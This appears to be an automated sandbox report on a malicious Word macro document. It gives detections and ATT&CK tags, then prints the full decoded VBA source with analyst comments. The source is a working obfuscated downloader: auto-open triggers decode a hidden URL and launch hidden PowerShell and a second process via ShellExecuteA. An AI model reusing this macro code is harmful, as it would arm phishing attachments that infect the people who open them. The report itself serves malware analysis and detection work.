MALICIOUS
174
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The AutoOpen and Workbook_Open macros trigger the execution of a function that appears to download and execute a second-stage payload, as indicated by the ShellExecuteA API call and the ClamAV detection as a downloader. The obfuscated nature of the script and the lack of specific indicators prevent a more precise family attribution.
Heuristics 9
-
ClamAV: Doc.Downloader.Generic-6698421-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
Reference to ShellExecute API — high — SC_STR_SHELLEXEC: Reference to ShellExecute API
-
Legacy WordBasic auto-exec macro marker — medium — OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
VBA macros detected — medium — 4 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
AutoOpen macro — low — OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script:
End Sub Sub AutoOpen() Auto_Open -
Workbook_Open macro — low — OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script:
End Sub Sub Workbook_Open() Auto_Open -
Auto_Open macro — low — OLE_VBA_AUTO: Auto_Open macro. Matched line in script:
Attribute VB_Customizable = True Sub Auto_Open() Dim data As String -
Environ() call (env variable access) — low — OLE_VBA_ENVIRON: Environ() call (env variable access). Matched line in script:
Public Function EQYQiKCPp1NTW7bdceBTMkDnrO() As String EQYQiKCPp1NTW7bdceBTMkDnrO = Environ(ikOeMJ46xYsvZe4D7bKGVxjGco("bubEqqB")) & Application.PathSeparator & ikOeMJ46xYsvZe4D7bKGVxjGco("mme/fnbofmjg") End Function -
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5101 bytes |

SHA-256: 021f1fade77537657f3afdeaeda40ae1e9a793ea192b1c401da81a44331d2687
Preview script — First 1,000 lines of the extracted script
' Module attributes emitted by olevba for the "ThisDocument" class module.
' VB_Base "1Normal.ThisDocument" is the Word document-class base — presumably a Word
' (not Excel) host, even though a Workbook_Open handler appears below.
' The OLE_VBA_AUTO heuristic's matched line starts at the VB_Customizable attribute here.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Entry point: a legacy auto-exec name that the host runs when the document is opened.
' The two locals are never used; the only real work is the call into module CD, whose
' Public Sub chains the two ShellExecuteA calls further down this listing.
Sub Auto_Open()
Dim data As String
Dim user As String
CD.PhoouWk6UBv1bOGqZTIYmBrnRG
End Sub
' Alias under the AutoOpen auto-exec name (no underscore); forwards to Auto_Open so the
' same chain fires whichever spelling the host honours. Matched by OLE_VBA_AUTOOPEN.
Sub AutoOpen()
Auto_Open
End Sub
' Excel workbook-open event name; also forwards to Auto_Open. Together with the two Subs
' above this gives three auto-exec triggers for one payload chain. Matched by OLE_VBA_WBOPEN.
Sub Workbook_Open()
Auto_Open
End Sub
' Module markers for "HD" (no code recovered for it) and "CD", followed by CD's Win32 imports.
' Sleep is declared with a LongPtr parameter and return; the real kernel32 Sleep takes a DWORD
' and returns nothing, so the declaration is loose but presumably still serves the Sleep 5000 below.
' ShellExecuteA (shell32.dll) is the process-launch primitive used by both payload functions —
' this is the import the SC_STR_SHELLEXEC heuristic flagged.
Attribute VB_Name = "HD"
Attribute VB_Name = "CD"
Private Declare PtrSafe Function Sleep Lib "kernel32" (ByVal Time As LongPtr) As LongPtr
Private Declare PtrSafe Function ShellExecuteA Lib "shell32.dll" (ByVal fg As LongPtr, ByVal er As String, ByVal jtr As String, ByVal vwer4 As String, ByVal ity5 As String, ByVal vwe3 As Long) As Long
' Orchestrator called from Auto_Open. Runs the two stages in order:
' rsYu... (first ShellExecuteA, then a 5 s Sleep) and RcKv... (second ShellExecuteA).
' Both are defined further down; every string argument they use is decoded at runtime.
Public Sub PhoouWk6UBv1bOGqZTIYmBrnRG()
rsYuTbrzdzGWverm7K37vrnDEN
RcKvzAXnr6f8lgRVh0wKth5uRF
End Sub
' Empty function with one unused local; nothing in this listing calls it.
' Looks like padding or dead code left by the obfuscator — TODO confirm no other module references it.
Public Function InaWaOjFrP4Ojkc2ulPQLeLLN4()
Dim uB5KbPJfYH55a3163fWwAt8z7U As String
End Function
' Unreferenced button handler that only shows a "Demo" message box; the name is a mangled
' variant of CommandButton1 below. Presumably decoy or leftover form code, not part of the payload.
Private Sub CommandButt2on1()
MsgBox "Demo"
End Sub
' Builds a file path at runtime: Environ(<decoded env-var name>) & Application.PathSeparator & <decoded file name>.
' Both literals are obfuscated and pass through ikOe... (reverse, then shift each char by -1), so the
' real variable and file name only appear after decoding. This is the line OLE_VBA_ENVIRON matched;
' the returned path is spliced into the arguments of both ShellExecuteA calls below (staging location).
Public Function EQYQiKCPp1NTW7bdceBTMkDnrO() As String
EQYQiKCPp1NTW7bdceBTMkDnrO = Environ(ikOeMJ46xYsvZe4D7bKGVxjGco("bubEqqB")) & Application.PathSeparator & ikOeMJ46xYsvZe4D7bKGVxjGco("mme/fnbofmjg")
End Function
' Button handler showing a "Demo" message box; nothing in the payload chain calls it.
' Presumably benign form boilerplate kept to make the project look legitimate.
Private Sub CommandButton1()
MsgBox "Demo"
End Sub
' Stage 1: assembles a command line from decoded literals and launches it through ShellExecuteA.
'   yzkn...   - decoded literal the report summary treats as the download source
'   ...Zax    - local staging path returned by EQYQ...
'   ...Zax3   - decoded executable name (lpFile)
'   ...Zax2   - decoded command-line template with yzkn... and ...Zax spliced in (lpParameters)
' ShellExecuteA(hwnd=0, verb=<decoded>, file=...Zax3, params=...Zax2, dir=vbNullString, nShowCmd=0);
' nShowCmd 0 is SW_HIDE, so the child process gets no visible window.
' Sleep 5000 then blocks for 5 s — presumably so the fetch completes before stage 2 (RcKv...) runs.
' Detection note: an Office process spawning a hidden child via ShellExecute is the behaviour to alert on here.
Public Function rsYuTbrzdzGWverm7K37vrnDEN()
Dim yzknEUqFOLMQv4N0IrUi6RK8a1 As String
Dim c57nBbsnsTUt57rIWljAAG4Zax2 As String
Dim c57nBbsnsTUt57rIWljAAG4Zax As String
Dim c57nBbsnsTUt57rIWljAAG4Zax3 As String
yzknEUqFOLMQv4N0IrUi6RK8a1 = ikOeMJ46xYsvZe4D7bKGVxjGco("mme/22be`uqzsd0fujmoj0tfnfiu0fdnzoju0tk0tfevmdoj.qx0npd/topjubfsdusbppuubu00;quui")
c57nBbsnsTUt57rIWljAAG4Zax = EQYQiKCPp1NTW7bdceBTMkDnrO()
c57nBbsnsTUt57rIWljAAG4Zax3 = ikOeMJ46xYsvZe4D7bKGVxjGco("fyf/mmfitsfxpq")
c57nBbsnsTUt57rIWljAAG4Zax2 = ikOeMJ46xYsvZe4D7bKGVxjGco("()fmjGebpmoxpE/*uofjmDcfX/ufO!udfkcP.xfO)|!'#!eobnnpd.!") + yzknEUqFOLMQv4N0IrUi6RK8a1 + ikOeMJ46xYsvZe4D7bKGVxjGco("(-(") + c57nBbsnsTUt57rIWljAAG4Zax + ikOeMJ46xYsvZe4D7bKGVxjGco("#~*(")
ShellExecuteA 0, ikOeMJ46xYsvZe4D7bKGVxjGco("ofqp"), c57nBbsnsTUt57rIWljAAG4Zax3, c57nBbsnsTUt57rIWljAAG4Zax2, vbNullString, 0
Sleep 5000
End Function
' UserForm1 initialiser: centres the form on the host Application window, fills its controls with
' demo data, then calls HookMouseToForm, which is not present in the extracted source.
' Nothing here touches the payload chain; looks like benign form boilerplate, possibly copied in.
Private Sub UserForm_Initialize()
Me.StartUpPosition = 0
Me.Left = Application.Left + Application.Width / 2 - Me.Width / 2
Me.Top = Application.Top + Application.Height / 2 - Me.Height / 2
AddDemoData
HookMouseToForm Me
End Sub
' Fills ListBox1 and ComboBox1 with the numbers 1..100 and appends each number on its own line
' to TextBox1. tValue is declared but never used. Only reached from UserForm_Initialize.
Private Sub AddDemoData()
Dim i As Long
Dim tValue As String
For i = 1 To 100
ListBox1.AddItem i
ComboBox1.AddItem i
TextBox1.Value = TextBox1.Value & vbNewLine & i
Next i
End Sub
' Stage 2: second ShellExecuteA, again with nShowCmd 0 (hidden window).
'   DkasdaSS  - decoded executable name (lpFile)
'   dsnx...   - the staging path from EQYQ... followed by a decoded suffix (lpParameters)
' Because the parameters begin with the same path stage 1 passed on its command line, this
' presumably runs or registers whatever stage 1 staged there — confirm by decoding the literals;
' the report does not attribute a family.
Public Function RcKvzAXnr6f8lgRVh0wKth5uRF()
Dim dsnxrH9hahsm5qCcQmDaEHpz5U As String
Dim DkasdaSS As String
DkasdaSS = ikOeMJ46xYsvZe4D7bKGVxjGco("fyf/34swthfs")
dsnxrH9hahsm5qCcQmDaEHpz5U = EQYQiKCPp1NTW7bdceBTMkDnrO() + ikOeMJ46xYsvZe4D7bKGVxjGco("sfwsfTsfutjhfSmmE-")
ShellExecuteA 0, ikOeMJ46xYsvZe4D7bKGVxjGco("ofqp"), DkasdaSS, dsnxrH9hahsm5qCcQmDaEHpz5U, vbNullString, 0
End Function
' String deobfuscator used for every literal in module CD. Two passes with a fixed key of 1:
' MSk9... reverses the input, then yl2... subtracts 1 from each character code.
' The key is a constant in the source, so an analyst can recover every literal offline for IOC extraction.
Function ikOeMJ46xYsvZe4D7bKGVxjGco(rvjM3bXjR8bob3KIowEW0xf9C5 As String) As String
ikOeMJ46xYsvZe4D7bKGVxjGco = yl2VAHBhZmVxM7LFecCwvGr5nh(MSk9MujTAcBLpEYaKCvrFgYJmm(rvjM3bXjR8bob3KIowEW0xf9C5, Len(rvjM3bXjR8bob3KIowEW0xf9C5), 1), Len(rvjM3bXjR8bob3KIowEW0xf9C5), 1)
End Function
' Reverse a string: for i = 1..len, out(i) = in(len - i + k). With k = 1 (the only value passed
' in this listing) that is a plain reversal. Works on a copy, so the argument is left unchanged.
' The loop index is not declared anywhere visible, so it is an implicit Variant.
Public Function MSk9MujTAcBLpEYaKCvrFgYJmm(rvjM3bXjR8bob3KIowEW0xf9C5 As String, f00X37sdwP7Ms4ZmpMozAJmnb5 As Long, SRrhQjK8Vgt4Ed68H4LbDK6NHS As Long) As String
Dim sM47ON58GbwO9XCuj33vIK3CCr As String
sM47ON58GbwO9XCuj33vIK3CCr = rvjM3bXjR8bob3KIowEW0xf9C5
For xA2qUdZ7O8DYSf8GWfM24xZSlD = 1 To f00X37sdwP7Ms4ZmpMozAJmnb5
Mid$(sM47ON58GbwO9XCuj33vIK3CCr, xA2qUdZ7O8DYSf8GWfM24xZSlD, 1) = Mid$(rvjM3bXjR8bob3KIowEW0xf9C5, f00X37sdwP7Ms4ZmpMozAJmnb5 - xA2qUdZ7O8DYSf8GWfM24xZSlD + SRrhQjK8Vgt4Ed68H4LbDK6NHS, 1)
Next
MSk9MujTAcBLpEYaKCvrFgYJmm = sM47ON58GbwO9XCuj33vIK3CCr
End Function
' Subtract k from every character code over the first len characters: Chr(Asc(c) - k).
' Edits the argument in place (VBA String parameters are ByRef by default) and then returns
' that same string; sM47... only ever holds the current character. Called with k = 1 above.
Public Function yl2VAHBhZmVxM7LFecCwvGr5nh(rvjM3bXjR8bob3KIowEW0xf9C5 As String, f00X37sdwP7Ms4ZmpMozAJmnb5 As Long, SRrhQjK8Vgt4Ed68H4LbDK6NHS As Long) As String
Dim sM47ON58GbwO9XCuj33vIK3CCr As String
For xA2qUdZ7O8DYSf8GWfM24xZSlD = 1 To f00X37sdwP7Ms4ZmpMozAJmnb5
sM47ON58GbwO9XCuj33vIK3CCr = Chr(Asc(Mid$(rvjM3bXjR8bob3KIowEW0xf9C5, xA2qUdZ7O8DYSf8GWfM24xZSlD, 1)) - SRrhQjK8Vgt4Ed68H4LbDK6NHS)
Mid$(rvjM3bXjR8bob3KIowEW0xf9C5, xA2qUdZ7O8DYSf8GWfM24xZSlD, 1) = sM47ON58GbwO9XCuj33vIK3CCr
Next
yl2VAHBhZmVxM7LFecCwvGr5nh = rvjM3bXjR8bob3KIowEW0xf9C5
End Function
' ----------- Headers ------------
' Module attributes for UserForm1, the form whose handlers (UserForm_Initialize, AddDemoData,
' the CommandButton Subs) were emitted above. VB_Base carries the form's type-library GUIDs.
' Header only — no further code follows it in the extraction.
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{CDD442AE-698E-49DA-BC4D-23D32B5C1B66}{ED9391B7-85F4-4782-A503-612FDFD2A16B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False